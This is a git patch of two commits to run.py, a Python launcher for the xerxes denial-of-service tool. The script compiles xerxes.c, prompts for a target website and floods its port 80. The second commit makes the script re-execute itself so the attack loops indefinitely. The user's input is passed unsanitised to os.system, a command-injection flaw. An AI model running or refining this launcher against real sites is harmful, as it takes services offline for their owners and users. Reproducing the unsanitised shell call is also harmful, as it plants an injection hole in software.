From 6919196b074b10d93978c844fdcede43af607a50 Mon Sep 17 00:00:00 2001 From: codiei2722-lang Date: Tue, 12 Aug 2025 12:15:37 +0700 Subject: [PATCH 1/2] Update run.py --- run.py | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/run.py b/run.py index 64e9655..d892fbf 100644 --- a/run.py +++ b/run.py @@ -1,11 +1,10 @@ import os os.system("clear") print(""" - ____ ____ _ _ _ _ -| _ \| _ \ ___ ___ / \ | |_| |_ __ _ ___| | __ -| | | | | | |/ _ \/ __| / _ \| __| __/ _` |/ __| |/ / -| |_| | |_| | (_) \__ \ / ___ \ |_| || (_| | (__| < -|____/|____/ \___/|___/ /_/ \_\__|\__\__,_|\___|_|\_\ +___ ____ ____ ____ ___ ___ ____ ____ _ _ +| \ | | [__ |__| | | |__| | |_/ +|__/ |__| ___] | | | | | | |___ | \_ + """) os.system("chmod +x xerxes.c") os.system("gcc xerxes.c -o xerxes") From fbf2d6153fcd58b16f5e984e048d99557621eaf8 Mon Sep 17 00:00:00 2001 From: codiei2722-lang Date: Tue, 12 Aug 2025 15:03:29 +0700 Subject: [PATCH 2/2] Update run.py --- run.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/run.py b/run.py index d892fbf..9f57055 100644 --- a/run.py +++ b/run.py @@ -1,4 +1,5 @@ import os +import sys os.system("clear") print(""" ___ ____ ____ ____ ___ ___ ____ ____ _ _ @@ -10,3 +11,5 @@ os.system("gcc xerxes.c -o xerxes") a = input("\n Enter website address eg : www.fakesite.com \n Website Name : ") os.system("./xerxes "+a+" 80") + +os.execv(sys.executable, ['python'] + sys.argv)